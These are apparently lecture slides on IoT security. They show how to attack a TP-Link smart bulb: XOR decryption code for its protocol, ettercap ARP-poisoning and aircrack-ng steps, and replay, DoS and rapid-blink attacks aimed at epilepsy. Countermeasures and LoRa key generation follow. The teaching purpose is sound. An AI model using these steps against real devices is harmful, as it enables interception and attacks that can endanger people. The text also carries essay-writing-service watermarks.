Dr Weitao Associate
IoTSecurityAnalysis: ExperimentalStudy
• Analyse the security of IoT devices
Copyright By PowCoder代写 加微信 powcoder
➢ Case study: smart bulb
➢ Common tools
➢ Common attacks and countermeasures
• Key generation from wireless channels
➢ Principles
➢ Case study: LoRa (Long Range Communication)
TP-link smart bulb
• Change color
• Change brightness
• Works with any Wi-Fi router
• Energy Saving
• Works with Google assistant and Amazon Alexa
Experimental Set-up
• TCP/UDP protocols between router and bulb, router and App
• Control messages sent from the app to the light bulb via the AP
• Blub acts as an access point (AP) that the app can connect to
https://www.youtube.com/watch?v=TexzX2 AKU0Q
Wifi router
Security requirements
• Confidentiality • Integrity
• Availability
Confidentiality
Weak Encryption: XOR cipher
Decryption attack
XOR encryption is easy to attack!
data = { “smartlife.iot.smartbulb.lightingservice”: {
“transition_light_state”: { “on_off”: 0, “transition_period”: 0
data = (4 bytes data length big endian) + encrypt(data.json()) send data to bulb_ip_address:9999 by TC
def encrypt(message):
key = 0xAB
message = list(message)
for i, byte in enumerate(message):
message[i] = byte ^ key
key = message[i] return bytes(message)
def decrypt(message):
key = 0xAB
message = list(message)
for i, byte in enumerate(message):
message[i] = byte ^ key
key = byte
return bytes(message)
https://www.openlearning.com/u/cooperchen/blog/HackingTplinkSmartBulb
• No authentication/integrity check
• Data may be re-modified
• Susceptible to packet modification attack etc.
Availability
• The measure of how easily an attacker can access the device. Then to deny access to the intended user
• Easy to attack the device by either replay or packet injection methods
• Sending multiple ‘off’ packets to deny service (DOS)
• Ettercap
• Aircrack-ng
• Wireshark
• Packet sender
• ALFAWi-Firouter
Attacker: me!
Get started with hacking
Preparation
1. Use ettercap to obtain MAC and IP information of the bulb
ettercap –G
sniffer->wlan0
hosts->host list->scan for hosts
Tips: must connect to local Wi-Fi through ALFA router 11
2. Start ARP poisoning attack: to capture the messages between phone and bulb
1) 10.0.0.26-> add to target 1 10.0.0.137-> add to target 2
2) MITM->ARP poisoning attack->only poison one way
3) View->connections->click smartphone
Colour control UDP 9999 Turn on/off TCP 9999
3. Use nmap to obtain the port information of bulb
4. Use Aircrack-ng to scan the local network airmon-ng
airmon-ng start wlan0 airmon-ng check kill airodump-ng wlan0mon airmon-ng stop wlan0mon
Common Attacks-replay attack
• Type of man in the middle attack • Genuine traffic is captured
• Then maliciously replayed
Replay attack-demo
1. Use Wireshark to capture packets
Tips: must first perform ARP poisoning attack first, otherwise you can’t capture messages.
Replay attack-demo
2. Use Filter to find useful packets
Replay attack-demo
3. Use Packet Sender to replay packets
Or write your own scripts to perform replay attack.
Common Attacks-denial-of-service (DDoS) attack
• Replay attack and injection attack can both be used to deny service
DDOS attack-demo
Wrist a script to keep sending OFF command.
Blink attack-demo
Wrist a script to turn on/off blub continuously.
-Epilepsy!
Countermeasures
Decryption attack
-use more advanced encryption methods like AES.
Replay attack
-sequence number or timestamp
Dos attack
– hard to prevent because there’re many ways to attack -Strategies:
channel hopping
detect jamming area
filters/detectors to block suspicious actions.
• Learned how to analyse the security of IoT devices
• Learned how to use security analysis tools, such as wireshark, packet sender
More references
• More hacking tools https://www.cse.wustl.edu/~jain/cse571- 07/ftp/wireless_hacking/index.html#24
• Hack Tp-link smart bulb
https://www.openlearning.com/u/cooperchen/blog/HackingTplink
• Hack LIFX bulb https://sites.google.com/view/lifx-replay-
attack/command-list?authuser=0
Appendix: hacking tools
• ALinuxdistributiondesigned for digital forensics and penetration testing.
• Supports a lot of tools:
Aircrack-ng
Reverse Engineering tools ……
• Ettercap is a comprehensive suite for man in the middle attacks.
• Protocol analysis • Security auditing
Aircrack-ng
Aircrack-ng is a complete suite of tools to assess WiFi network security.
It focuses on different areas of WiFi security:
• Monitoring: Packet capture and export of data to text files for further processing by third party tools
• Attacking: Replay attacks, deauthentication, fake access points and others via packet injection
• Testing: Checking WiFi cards and driver capabilities (capture and injection)
• Cracking: WEP and WPA PSK (WPA 1 and 2)
• Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development
Packet sender
• Packet Sender is an open source utility to allow sending and receiving TCP and UDP packets.
ALFA Wi-Fi router
• Receive/send 802.15.11 packets
• Used for packet sniffing and packet injection
Key generation from wireless channels
• Principles
• Case study: LoRa (Long Range Communication)
Background-Wireless security Wireless sensor network (WSN)
• Alice and Bob share the same key
• Eve can’t obtain or guess the key
Traditional key generation/negotiation methods
1. Pre-shared key.
Used for ever, unsecure
2. Public key infrastructure (PKI).
Unsuitable for mobile computing devices.
3. Diffie–Hellman (D-H) protocol.
Computational overhead is expensive for embedded sensors.
How to generate keys from wireless channel?
Use wireless channel characteristics to generate keys. -Receive signal strength indicator (RSSI) -Channel state information (CSI)
Principles:
1. Reciprocity of radio wave propagation
2. Temporal variations in the radio channel
3. Spatial variations in the radio channel.
d>16cm for 915Mhz
Different LPWAN technologies
Case study: key generation system for LoRa
What is LoRa?
LoRa: Long Range Communication Technology LoRa® is the physical layer or the wireless modulation utilized to create the long range communication link.
Key features
• Unlicensed spectrum North America 915Mhz,
Europe 868Mhz
• Low power consumption
• Low data rate (300-30Kbps)
• Long range Urban 0-5Km, Rurual 0-10Km
Channel measurement
Channel measurement
Quantization
Quantization
Reconciliation
Reconciliation
Privacy Amplification
Privacy Amplification
Secure communication
Quantization convert RSSI into bits (0 or 1)
Segmentation
Calculate boundaries
Quantization
Reconciliation:
▪ Correct mismatches
KAlice=1101001 KBob=1001101
KAlice≈ K -correction code
f(·): encode function g(·): decode function
Alice: δAlice = KAlice ⊕ f(g(KAlice)). Bob: K’Alice = δAlice ⊕ f(g(KBob ⊕ δAlice)).
Privacy amplification
▪ Reconciliation step reveal information to attackers
Alice and Bob exchange a number of packets for this step
▪ Universal hash function-SHA
▪ After key generation, Alice and Bob can use symmetric
encryption method to secure their communication such as AES.
Evaluation Experimental device: mdot LoRa module
Indoor static scenario Indoor mobile scenario Outdoor static scenario Outdoor mobile scenario
• Key generation rate (bits/sec)
• Key match rate (%)
Evaluation
Experimental setup:
Correlation analysis
• Learned the basics of key generation from wireless channels
• Learned how to generate keys for LoRa
程序代写 CS代考 加微信: powcoder QQ: 1823890830 Email: powcoder@163.com